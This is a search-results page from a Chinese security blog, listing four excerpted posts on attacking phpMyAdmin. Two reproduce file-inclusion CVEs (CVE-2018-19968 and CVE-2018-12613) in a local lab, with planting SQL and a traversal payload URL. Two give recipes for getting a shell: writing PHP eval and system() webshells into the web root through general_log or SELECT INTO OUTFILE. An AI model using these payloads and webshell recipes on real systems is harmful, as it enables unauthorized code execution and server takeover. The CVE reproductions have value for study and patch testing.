TypechoJoeTheme

K.Fire's Blog

K.Fire

没有勇敢的工作
只有困难的打工人
网站页面
搜索到 4 篇与 phpmyadmin 的结果
2020-04-26

(CVE-2018-19968) phpmyadmin 文件包含复现

(CVE-2018-19968) phpmyadmin 文件包含复现
由于转换功能中出错,攻击者可以利用 phpMyAdmin 在 4.8.4 之前泄漏本地文件的内容。攻击者必须有权访问 phpMyAdmin 配置存储表,尽管这些表可以很容易地在攻击者有权访问的任何数据库中创建。攻击者必须具有有效的凭据才能登录到 phpMyAdmin;但是,攻击者必须拥有有效的凭据。此漏洞不允许攻击者绕过登录系统。影响版本phpmyadmin 4.8.0~4.8.3复现环境phpstudyphpMyAdmin4.8.1复现过程创建数据库,写入sessionCREATE DATABASE foo; CREATE TABLE foo.bar ( baz VARCHAR(100) PRIMARY KEY ); INSERT INTO foo.bar SELECT '<?php phpinfo(); ?>'; 生成配置表http://192.168.2.1/phpmyadmin481/chk_rel.php?fixall_pmadb=1&db=foo 篡改pma_columninfo表INSERT INTO pma__column_info SELEC...
K.Fire
2020-04-26

分享

178 阅读
0 评论
2020年04月26日
178 阅读
0 评论
2020-04-26

(CVE-2018-12613) phpmyadmin 文件包含复现

(CVE-2018-12613) phpmyadmin 文件包含复现
phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑,通过二次编码即可绕过检查,造成远程文件包含漏洞。影响版本phpMyAdmin 4.8.0/4.8.1复现环境phpstudyphpMyAdmin4.8.1复现过程session文件写入phpinfo如图,即在tmp文件夹session文件中插入了phpinfo代码。包含文件Payloadhttp://192.168.2.1/phpmyadmin481/index.php?target=db_sql.php%253f/../../../../../phpstudy/PHPTutorial/tmp/tmp/sess_5mk01jm6mpq5114m9hrk53g0qhnkrrcq 复现截图
K.Fire
2020-04-26

分享

45 阅读
0 评论
2020年04月26日
45 阅读
0 评论
2018-06-17

phpmyadmin利用log日志文件插入一句话

phpmyadmin利用log日志文件插入一句话
返回错误 ‘The MySQL server is running with the --secure-file-priv option so it cannot execute this statement’,这是因为mysql对通过文件导入导出作了限制,默认不允许。默认value值为null,则为禁止,如果有文件夹目录,则只允许改目录下文件(测试子目录也不行)。shell写出过程 general log 指的是日志保存状态,一共有两个值(ON/OFF)ON代表开启 OFF代表关闭。 general log file 指的是日志的保存路径。 general_log 的作用:开启它可以记录用户输入的每条命令,会把其保存在E:\phpstudy\PHPTutorial\MySQL\data\下的一个log文件中。 利用思路:开启general_log之后把general_log_file的值修改为网站路径下一个自定义的php文件中,然后通过log日志写入一句话后门。 利用codeset global general_log = "O...
K.Fire
2018-06-17

笔记

107 阅读
0 评论
2018年06月17日
107 阅读
0 评论
2016-04-10

phpmyadmin拿shell的四种经典方法

phpmyadmin拿shell的四种经典方法
方法一:CREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL ); INSERT INTO `mysql`.`study` (`7on` )VALUES ('&lt;?php @eval_r($_POST[7on])?&gt;'); SELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php'; ----以上同时执行,在数据库: mysql 下创建一个表名为:study,字段为7on,导出到E:/wamp/www/7.php 一句话连接密码:7on方法二:读取文件内容: select load_file('E:/xamp/www/s.php'); 写一句话: select '<?php @eval_r($_POST[cmd])?>;'INTO OUTFILE 'E:/xamp/www/study.php' cmd执行权限: select ‘<?php echo \'<pre>\’;system($_GET[\’cmd\’]); echo \...
K.Fire
2016-04-10

笔记

153 阅读
0 评论
2016年04月10日
153 阅读
0 评论